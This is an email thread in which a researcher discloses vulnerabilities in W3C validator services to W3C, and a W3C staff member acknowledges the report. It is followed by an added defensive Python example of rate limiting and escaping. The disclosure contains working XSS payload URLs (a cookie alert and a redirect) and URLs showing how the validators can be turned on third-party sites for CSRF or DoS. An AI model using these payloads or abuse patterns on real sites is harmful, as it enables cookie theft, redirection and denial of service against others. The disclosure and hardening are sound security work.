On 30 Jun 2010, at 4:34 AM, MustLive wrote:
Hello administrator of www.w3.org!
I want to warn you about security vulnerabilities on your site.
Hi ML,
Thanks for sending this to us. We are aware of this and are looking
into finding the right balance between continuing to offer services
and to avoid abuse.
Best,
_ Ian
These are Abuse of Functionality, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.
Abuse of Functionality:
This functionality can be used to conduct CSRF attacks on
other sites.
http://validator.w3.org/feed/check.cgi?url=http://google.com
http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl
http://validator.w3.org/check?uri=http://google.com
http://jigsaw.w3.org/css-validator/validator?uri=http://google.com
http://validator.w3.org/checklink?uri=http://google.com
Note that the W3C Link Checker service can be used to scan a
whole site, so it consumes more resources, both on W3C's server and
on the site being scanned. It can be used to conduct DoS
attacks on the mentioned servers. I described such attacks in the
article DoS attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/).
http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance
http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com
Insufficient Anti-automation:
These pages have no protection against automated requests
(captcha), which allows the process of conducting CSRF
attacks on other sites to be automated.
XSS (IE):
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl
Works only in Internet Explorer.
Attend to the security of all of your web sites and web software,
and to security audits.
I mentioned these vulnerabilities on my site (http://websecurity.com.ua/4320/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
--
Ian Jacobs ([email protected]) http://www.w3.org/People/Jacobs/
Tel: +1 718 260 9447
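One way a defender could harden a "fetch and check this URI" endpoint like the ones listed in the report, addressing the two points raised (no protection against automated requests, and a request parameter echoed unescaped into the page): per-client rate limiting plus HTML-escaping of the reflected value. This is an added example, not code from the thread or from W3C's validators; the handler, TokenBucket and the injected fetch callback are hypothetical.

```python
import html
import time
from urllib.parse import urlsplit

# Constructed example: a minimal handler for a validator-style endpoint
# that fetches a user-supplied URI and echoes it back. All names are hypothetical.

class TokenBucket:
    """Per-client token bucket: `rate` requests per second, burst of `capacity`."""
    def __init__(self, rate, capacity, now=time.monotonic):
        self.rate, self.capacity, self.now = rate, capacity, now
        self.state = {}  # client id -> (tokens, time of last refill)

    def allow(self, client):
        tokens, last = self.state.get(client, (self.capacity, self.now()))
        t = self.now()
        tokens = min(self.capacity, tokens + (t - last) * self.rate)
        if tokens < 1:
            self.state[client] = (tokens, t)
            return False
        self.state[client] = (tokens - 1, t)
        return True

ALLOWED_SCHEMES = {"http", "https"}

def validate_target(uri):
    """Accept only absolute http(s) URLs with a host; anything else is rejected."""
    parts = urlsplit(uri)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    return parts.geturl()

def handle_check(params, client, bucket, fetch):
    """Return (status, html_body). The echoed parameter is always HTML-escaped,
    so a value such as '<script>...' is rendered as text, never as markup."""
    raw = params.get("uri", "")
    shown = html.escape(raw, quote=True)
    if not bucket.allow(client):          # anti-automation: refuse before fetching
        return 429, f"<p>Too many requests; not fetching {shown}</p>"
    target = validate_target(raw)
    if target is None:
        return 400, f"<p>Invalid URI: {shown}</p>"
    result = fetch(target)                # hypothetical fetch, injected for testing
    return 200, f"<p>Checked {shown}: {html.escape(result)}</p>"
```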